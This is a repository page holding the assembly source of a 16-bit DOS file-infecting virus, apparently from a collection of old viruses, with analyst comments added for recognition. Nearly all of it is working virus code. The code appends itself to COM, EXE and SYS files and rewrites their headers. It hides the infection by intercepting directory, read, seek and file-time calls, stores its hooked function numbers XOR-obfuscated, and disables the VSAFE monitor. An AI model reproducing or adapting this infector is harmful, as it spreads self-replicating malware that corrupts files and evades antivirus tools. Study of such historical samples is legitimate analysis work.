
📄 alpha.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
		; ---------------------------------------------------------------------
		; Analyst annotations (static reading of the listing only).
		;
		; This excerpt is the tail of a 16-bit DOS file-infector listing. It
		; starts in the middle of a routine, and several symbols it uses
		; (int21, readwritefromsi, writeheader, restoreregs, setvirusactive,
		; restoreregsandsetvirusactive, loc_0_272, zeroal_iret, stealthmode,
		; savecs/saveip/savess/savesp, first2/next1, sysret/sysret2, sysentry,
		; execute, infectdx, infectsi, memstealth, hideourmem,
		; modifytomseginpsp, setnofilestealth, virus_start) are defined outside
		; it, so the fragment is not self-contained.
		;
		; Artifacts visible here that are useful for recognition and triage:
		;   * infected files grow by virussize (7D0h = 2000 bytes);
		;   * 0C8h is added to the byte at header+1Ch after a successful append;
		;     the same constant is tested against DH after INT 21h AX=5700h
		;     (DX = file date), i.e. the marker sits in the high byte of the
		;     date word (year field pushed forward);
		;   * INT 16h with AX=0FA02h / DX=5945h (the VSAFE/VWATCH get/set
		;     options call) is issued to read and rewrite the monitor's flags;
		;   * files whose name starts with "TB" are skipped;
		;   * the hooked INT 21h function numbers are stored XORed with 5Fh.
		;
		; NOTE(review): offsets from SI are read as "3-byte header followed by
		; the find-first DTA in tempdta" (header+18h = DTA+15h attribute,
		; header+19h time, header+1Bh date, header+1Dh size, header+21h name).
		; The DTA setup itself is before this excerpt - confirm against page
		; with the start of the file.
		; ---------------------------------------------------------------------

		; --- tail of a routine that begins before this excerpt ---
		int	21h
		push	es
		push	bx
		; AH=25h sets an interrupt vector to zeroal_iret. AL is loaded before
		; the excerpt; the restore below uses AX=2524h, so this is presumably
		; the INT 24h critical-error vector - TODO confirm.
		mov	ah, 25h
		mov	dx, offset zeroal_iret
		int	21h
		; AH=4Eh find-first with attribute mask 27h; DX is set to buffer.
		mov	ah, 4Eh
		mov	cl, 27h
		call	setdxtobuffer_int21
		jb	restoreint24anddta
		mov	si, offset header
		sub	di, di				; DI = 0, used as a zero constant below
		mov	al, [si+18h]
		mov	attribs, al			; saved into the operand of the patched "mov cl" at restoreattribs
		; Label names suggest a drive check; the value at [si] is written
		; outside this excerpt - TODO confirm.
		cmp	byte ptr [si], 2
		ja	notdriveAorB
		call	loc_0_272
		jz	checkfiletype

; Restores the saved interrupt vector (AX=2524h) and the saved DTA (AH=1Ah)
; from the stack, then falls through into the VSAFE call below.
restoreint24anddta:
		mov	ax, 2524h
		pop	dx
		pop	ds
		int	21h
		mov	ah, 1Ah
		pop	dx
		pop	ds
		int	21h
; Data bytes that execute as code: 0B3h is the opcode of "mov bl, imm8" and
; vsafestatus is its immediate operand, so BL is loaded with the stored flags.
togglevsafe	db 0B3h
vsafestatus	db 16h
; INT 16h AX=0FA02h DX=5945h: VSAFE/VWATCH get/set options (BL = new flags,
; CL = previous flags on return). The previous flags are stored back into
; vsafestatus, so the next call restores them.
vsafe:
		mov	ax, 0FA02h
		mov	dx, 5945h
		int	16h
		mov	cs:vsafestatus,	cl
ret4:
		ret

notdriveAorB:
		; [si+10h]/[si+12h] fall in the reserved part of the DTA under the
		; layout assumed above; their meaning is not established here.
		cmp	[si+12h], di
		jnz	checkfiletype
		cmp	word ptr [si+10h], 2
		jb	restoreint24anddta
		cmp	byte ptr [si], 3
		jb	checkfiletype
		; AH=2Ah get system date (CX = year, DH = month). 7BCh = 1980, the
		; base of the DOS date format. The file date word is compared with
		; the current year and month; a match skips the file.
		mov	ah, 2Ah
		int	21h
		sub	cx, 7BCh
		mov	ax, [si+1Bh]
		shr	ax, 1
		cmp	ah, cl
		jnz	checkfiletype
		shr	ax, 4
		and	al, 0Fh
		cmp	al, dh
		jz	restoreint24anddta

; Chooses a per-file-type handler in BP (default: setcarry_ret = "skip").
checkfiletype:
		mov	bp, offset setcarry_ret
		cmp	word ptr [si+21h], 4254h	; TB*  (name starts with "TB": skipped)
		jz	restoreint24anddta
		cmp	word ptr [si+0Ch], 4F43h	; CO
		jnz	notcominfection
		mov	bp, offset infectcom
notcominfection:
		; Size window and marker test: skip when the word at +1Eh is below
		; 0Bh, or when the byte at +1Ch is already >= 0C8h (marker present).
		cmp	word ptr [si+1Eh], 0Bh
		jb	restoreint24anddta
		cmp	byte ptr [si+1Ch], 0C8h
		jnb	restoreint24anddta
		; Attribute bits 0-2 set: clear them first (setattribs with CX = 0).
		mov	al, [si+18h]
		and	al, 7
		jz	attributesok
		sub	cx, cx
		call	setattribs
		jb	restoreint24anddta
attributesok:
		; AX=3D02h opens the file read/write; the handle is moved to BX.
		mov	ax, 3D02h
		call	setdxtobuffer_int21
		jb	near ptr restoreattribs
		xchg	ax, bx
		; AH=3Fh reads 19h bytes; readwritefromsi is outside this excerpt
		; (presumably it points DX at SI and issues INT 21h - TODO confirm).
		mov	ah, 3Fh
		mov	cx, 19h
		call	readwritefromsi
		; First word byte-swapped and compared with 4D5Ah ("MZ"): EXE image.
		mov	ax, [si]
		xchg	al, ah
		cmp	ax, 4D5Ah
		jnz	notexeinfection
		mov	bp, offset infectexe
		jmp	notsysinfection
notexeinfection:
		; First word 0FFFFh: treated as a device-driver (SYS) header.
		cmp	ax, 0FFFFh
		jnz	notsysinfection
		mov	bp, offset infectsys
notsysinfection:
		call	bp				; carry set = handler declined or failed
		jb	dontwriteheader
		call	writeheader
dontwriteheader:
		; AX=5700h incremented to 5701h: set file time/date from the saved
		; words at +19h/+1Bh (the byte at +1Ch carries the marker if the
		; append succeeded). AH=3Eh then closes the handle.
		mov	ax, 5700h
		mov	cx, [si+19h]
		mov	dx, [si+1Bh]
		inc	ax
		int	21h
		mov	ah, 3Eh
		int	21h
; Data bytes that execute as code: 0B1h is "mov cl, imm8" with attribs as the
; immediate, i.e. CL = original attribute byte before setattribs is called.
restoreattribs	db 0B1h
attribs		db 20h
		call	setattribs
		jmp	restoreint24anddta

; AX=4301h (set file attributes), then shares the tail below.
setattribs:
		mov	ax, 4301h
; Clears CH, points DX at buffer and jumps to int21 (defined outside).
setdxtobuffer_int21:
		mov	ch, 0
		mov	dx, offset buffer
		jmp	int21

; EXE handler. Returns carry set when the file is skipped or the append fails.
infectexe:
		cmp	byte ptr [si+18h], 40h	;WINDOZE EXE ?
		jz	setcarry_ret
		; Image size from the header (pages at +4, last-page bytes at +2)
		; must equal the file size at +1Dh/+1Fh; otherwise the file is
		; skipped (the following label calls this "no internal overlays").
		mov	ax, [si+4]
		dec	ax
		mov	cx, 200h
		mul	cx
		add	ax, [si+2]
		adc	dx, di
		cmp	[si+1Dh], ax
		jnz	setcarry_ret
		cmp	[si+1Fh], dx
		jz	nointernaloverlays
setcarry_ret:
		stc
		ret
nointernaloverlays:
		; Original SS, SP, CS, IP header fields are saved.
		mov	ax, [si+0Eh]
		mov	ds:savess, ax
		mov	ax, [si+10h]
		mov	ds:savesp, ax
		mov	ax, [si+16h]
		mov	ds:savecs, ax
		mov	ax, [si+14h]
		mov	ds:saveip, ax
		call	appendvirus
		jb	exitinfectexe
		; Header fields CS (+16h), IP (+14h), SS (+0Eh), SP (+10h) and
		; +0Ah are rewritten from the old file size minus the header size
		; (paragraphs at +8 times 10h).
		mov	ax, [si+8]
		mov	cl, 10h
		mul	cx
		neg	ax
		not	dx
		add	ax, [si+1Dh]
		adc	dx, di
		add	dx, [si+1Fh]
		div	cx
		mov	[si+16h], ax
		mov	[si+14h], dx
		dec	ax
		mov	[si+0Eh], ax
		mov	word ptr [si+10h], 9D2h
		add	word ptr [si+0Ah], 0ADh
		; Page count (+4) and last-page bytes (+2) recomputed for the old
		; size plus virussize.
		mov	ax, [si+1Dh]
		mov	dx, [si+1Fh]
		add	ax, virussize
		adc	dx, di
		mov	cx, 200h
		div	cx
		inc	ax
		mov	[si+4],	ax
		mov	[si+2],	dx
		clc
exitinfectexe:
		ret

; COM handler. Skips files whose word at +1Eh exceeds 0D6h.
infectcom:
		cmp	word ptr [si+1Eh], 0D6h
		ja	exitcominfect
		; The first three bytes of the file are saved (first2, next1).
		mov	ax, [si]
		mov	word ptr ds:first2, ax
		mov	al, [si+2]
		mov	byte ptr ds:next1, al
		mov	ax, 0FFF0h
		mov	ds:savecs, ax
		mov	ds:savess, ax
		mov	word ptr ds:saveip, 100h
		mov	word ptr ds:savesp, 0FFFEh
		call	appendvirus
		jb	exitcominfect
		; Header byte 0 becomes 0E9h (near jmp) with displacement
		; old size - 3.
		mov	byte ptr [si], 0E9h
		mov	ax, -3 ;0FFFDh
		add	ax, [si+1Dh]
		mov	[si+1],	ax
		clc
exitcominfect:
		ret

; SYS handler. Saves the word at +8 and replaces it with
; old size + offset sysentry.
infectsys:
		mov	ax, [si+8]
		mov	word ptr ds:sysret, ax
		mov	word ptr ds:sysret2, ax
		call	appendvirus
		jb	ret5
		mov	ax, [si+1Dh]
		add	ax, offset sysentry
		mov	[si+8],	ax
		clc
ret5:
		ret

; Seeks to end of file and writes virussize bytes (AH=40h, DX = 0 after cwd).
; A short write returns with carry set; otherwise the marker 0C8h is added to
; the byte at +1Ch and execution falls through to seek back to offset 0.
appendvirus:
		mov	al, 2
		call	lseek
		mov	ah, 40h
		mov	cx, virussize
		cwd
		call	int21
		cmp	ax, cx
		stc
		jnz	ret1
		add	byte ptr [si+1Ch], 0C8h
lseekstart:
		mov	al, 0
; AH=42h seek with origin in AL and offset CX:DX = 0 (cwd on a positive AX).
lseek:
		mov	ah, 42h
		cwd
		mov	cx, dx
doint21:
		int	21h
ret1:
		ret

; AX=4202h seek relative to end of file with CX = 0FFFFh; the caller supplies
; a negative low word in DX.
lseekbeforeend:
		mov	ax, 4202h
		mov	cx, 0FFFFh
		jmp	doint21

; Handles below 5 return with carry set (treated as "not ours").
checkhandle:
		cmp	bl, 5                   ;LAME HANDLE CHEQ.
		jb	exittimestealth
; AX=5700h get file time/date; the final compare leaves carry set when
; DH < 0C8h, i.e. when the marker is absent.
checkinfection:
		mov	ax, 5700h
		int	21h
		jb	exittimestealth
		cmp	dh, 0C8h
exittimestealth:
		ret

; Seek hook (table entry for 42h). For origin AL = 2 on a marked handle the
; requested offset CX:DX is reduced by virussize before the call is issued.
blocklseek:
		cmp	al, 2
		jnz	ret1
		call	checkinfection
		jb	ret1
		pop	ax
		call	near ptr restoreregs
		push	cx
		sub	dx, virussize
		sbb	cx, 0
		int	21h
		pop	cx
		jmp	setvirusactive_exit

; Self-modifying switch: writes AL over the first byte of fcbdirstealth.
; 0C3h is the opcode of "ret", which turns that handler into a no-op.
setnodirstealth:
		mov	al, 0C3h
setdirstealth:
		mov	byte ptr cs:fcbdirstealth, al
		ret

; FCB find hook (table entries for 11h/12h). The leading nop is the byte that
; setdirstealth overwrites. AL = 0FFh after the call means no match.
fcbdirstealth:
		nop
		inc	sp
		inc	sp
		int	21h
		cmp	al, 0FFh
		jz	setvirusactive_exit
		pushf
		push	ax
		call	getdta
		cmp	byte ptr [bx], 0FFh	; 0FFh first byte: extended FCB, 7 bytes longer
		jnz	notextended
		add	bx, 7
notextended:
		; Entries whose byte at +1Ah is below 0C8h are left untouched;
		; otherwise the marker is subtracted and the size is adjusted.
		cmp	[bx+1Ah], al
		jb	exitdirstealth
		sub	[bx+1Ah], al
		add	bx, 3
		jmp	stealthdirsize

; AH=2Fh get DTA address (ES:BX); returns AL = 0C8h and DS = ES.
getdta:
		mov	ah, 2Fh
		int	21h
		mov	al, 0C8h
		push	es
		pop	ds
		ret

; Handle-style find hook (table entries for 4Eh/4Fh): same marker removal on
; the DTA byte at +19h, then the shared size adjustment.
asciidirstealth:
		inc	sp
		inc	sp
		int	21h
		jb	setvirusactive_exit
		pushf
		push	ax
		call	getdta
		cmp	[bx+19h], al
		jb	exitdirstealth
		sub	[bx+19h], al
; Subtracts virussize from the reported 32-bit size at +1Ah/+1Ch unless the
; word at +1Bh is below 0Bh.
stealthdirsize:
		cmp	word ptr [bx+1Bh], 0Bh
		jb	exitdirstealth
		sub	word ptr [bx+1Ah], virussize
		sbb	word ptr [bx+1Ch], 0
exitdirstealth:
		call	restoreregs
		pop	ax
		popf
setvirusactive_exit:
		call	setvirusactive
		jmp	exitkeepflags

; Records the current file position (seek origin 1, offset 0) in the
; oldposlo/oldposhi operands below, then, unless this handle is already
; cached in `handle`, reads the last 21h bytes of the file into header.
readoldheader:
		mov	al, 1
		call	lseek
		push	cs
		pop	ds
		mov	oldposlo, ax
		mov	oldposhi, dx
		mov	si, offset header
		cmp	handle, bl
		jz	ret0
		mov	dx, 0FFDFh			; -21h
		call	lseekbeforeend
		mov	ah, 3Fh
		mov	cx, 21h
		call	readwritefromsi
		mov	handle, bl
; Seeks back to the recorded position. 0B9h/0BAh are the opcodes of
; "mov cx, imm16" / "mov dx, imm16"; oldposhi/oldposlo are their operands.
lseektooldpos:
		mov	ax, 4200h
		db 0B9h
oldposhi	dw 0
		db 0BAh
oldposlo	dw 0
		int	21h
ret0:
		ret

; Write hook (table entry for 40h). On a marked handle: rewrites the start of
; the file via writeheader, issues a zero-length write at end - virussize,
; subtracts the marker from DH and sets the file time/date (AX=5701h).
disinfecthandle:
		call	checkhandle
		jb	ret0
		push	cx
		push	dx
		call	readoldheader
		call	lseekstart
		call	writeheader
		mov	dx, 0F830h      ; -virussize
		call	lseekbeforeend
		mov	ah, 40h
		sub	cx, cx
		int	21h
		pop	dx
		pop	cx
		sub	dh, 0C8h
		mov	ax, 5701h
		int	21h
		jmp	lseektooldpos

; Read hook (table entry for 3Fh). On a marked handle the request is compared
; with the size stored at +1Dh/+1Fh of the recovered header; reads that fall
; within the first 18h bytes get bytes from `header` copied over the caller's
; buffer after the real read.
stealthread:
		mov	bp, cx				; requested byte count
		call	checkhandle
		jb	ret0
		pop	ax
		call	readoldheader
		sub	ax, [si+1Dh]
		sbb	dx, 0
		sub	dx, [si+1Fh]
		js	adjustread
		; Position at or past the stored size: report 0 bytes read.
		call	restoreregsandsetvirusactive
		sub	ax, ax
		clc
exitkeepflags:
		retf    2				; far return that discards the caller's saved flags word
adjustread:
		add	ax, bp
		adc	dx, 0
		jnz	bigread
		sub	bp, ax
bigread:
		push	bp
		call	near ptr restoreregs
		pop	cx
		int	21h
		pushf
		push	ax
		jb	exitstealthread
		push	ds
		pop	es
		mov	di, dx
		push	cs
		pop	ds
		mov	si, offset header
		; Only positions below 18h in the file overlap the patched header.
		cmp	oldposhi, 0
		jnz	exitstealthread
		mov	ax, oldposlo
		cmp	ax, 18h
		jnb	exitstealthread
		add	si, ax
		add	cx, ax
		cmp	cx, 18h
		jbe	moveit
		sub	ax, 18h
		neg	ax
		xchg	ax, cx
moveit:
		cld
		rep movsb
exitstealthread:
		call	restoreregsandsetvirusactive
		pop	ax
popf_exitwithflags:
		popf
		jmp	exitkeepflags

; File time/date hook (table entry for 57h). stealthmode is defined outside
; this excerpt; the values 12h and 14h are compared and stored here but their
; meaning is not established by the visible code.
gettimestealth:
		cmp	byte ptr cs:stealthmode, 12h
		jnz	dotimestealth
		cmp	al, 0
		jz	ret2
setfullstealth:
		mov	byte ptr cs:stealthmode, 14h
		ret
dotimestealth:
		cmp	al, 0
		jnz	settimestealth
		; AL = 0 (get): issue the call, then strip the marker from DH.
		inc	sp
		inc	sp
		int	21h
		pushf
		jb	setvirusactive_exit1
		call	removemarkerfromdh
setvirusactive_exit1:
		call	setvirusactive
		jmp	popf_exitwithflags
settimestealth:
		; AL != 0 (set): the current marker state of the file is read
		; first, and the marker is added to or removed from the caller's
		; DH so that the stored state is kept.
		call	setfullstealth
		mov	ax, 5700h
		int	21h
		jb	ret2
		pop	ax
		cmp	dh, 0C8h
		call	near ptr restoreregs
		jb	removemarkeranddoint21
		cmp	dh, 0C8h
		jnb	doint21andexit
		add	dh, 0C8h
doint21andexit:
		int	21h
		pushf
		jmp	setvirusactive_exit1
removemarkeranddoint21:
		call	removemarkerfromdh
		jmp	doint21andexit
; Subtracts 0C8h from DH when DH >= 0C8h.
removemarkerfromdh:
		cmp	dh, 0C8h
		jb	notmarked
		sub	dh, 0C8h
notmarked:
		ret

; Close hook (table entry for 3Eh): clears the cached handle.
sethandletozero:
		mov	cs:handle, 0
ret2:
		ret

; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fh
; Each byte is an INT 21h AH value XOR 5Fh (e.g. 13h xor 5Fh = 4Ch). There
; are 20 entries here and 20 words in functionoffsets; entry N presumably
; pairs with word N - the lookup code is outside this excerpt.
functions	db	013h		; 4Ch - prog terminate
		db	017h		; 48h - create mem block
		db	016h		; 49h - release memory
		db	015h		; 4Ah - resize mem block
		db	00Dh		; 52h - get SYSVARS
		db	0B5h		; 0EAh - ALLOC HUGE SEG
		db	06Dh		; 32h - GET DPB
		db	014h		; 4Bh - program EXEC
		db	062h		; 3Dh - open file
		db	04Eh		; 11h - fcb FindFirst
		db	04Dh		; 12h - fcb FindNext
		db	011h		; 4Eh - ASCII FindFirst
		db	010h		; 4Fh - ASCII FindNext
		db	008h		; 57h - get/set file time
		db	033h		; 6Ch - extended open
		db	01Ch		; 43h - get/set attribs
		db	061h		; 3Eh - handle close
		db	01Fh		; 40h - handle write
		db	01Dh		; 42h - lseek
		db	060h		; 3Fh - handle read
; Handler offsets, in the same order as the table above.
functionoffsets	dw	offset setnofilestealth
		dw	offset memstealth
		dw	offset memstealth
		dw	offset memstealth
		dw	offset hideourmem
		dw	offset modifytomseginpsp
		dw	offset setnodirstealth
		dw	offset execute
		dw	offset infectdx
		dw	offset fcbdirstealth
		dw	offset fcbdirstealth
		dw	offset asciidirstealth
		dw	offset asciidirstealth
		dw	offset gettimestealth
		dw	offset infectsi
		dw	offset infectdx
		dw	offset sethandletozero
		dw	offset disinfecthandle
		dw	offset blocklseek
		dw	offset stealthread
; Working storage. The initial header bytes CDh 20h 90h encode INT 20h / NOP.
header		db	0CDh,020h,090h
tempdta		db	3Ch dup (0)
buffer		db	80h dup (0)
handle		db	0
virussize	=	7D0h			; 2000 bytes; matches the 0F830h (-virussize) constant above
		end    virus_start
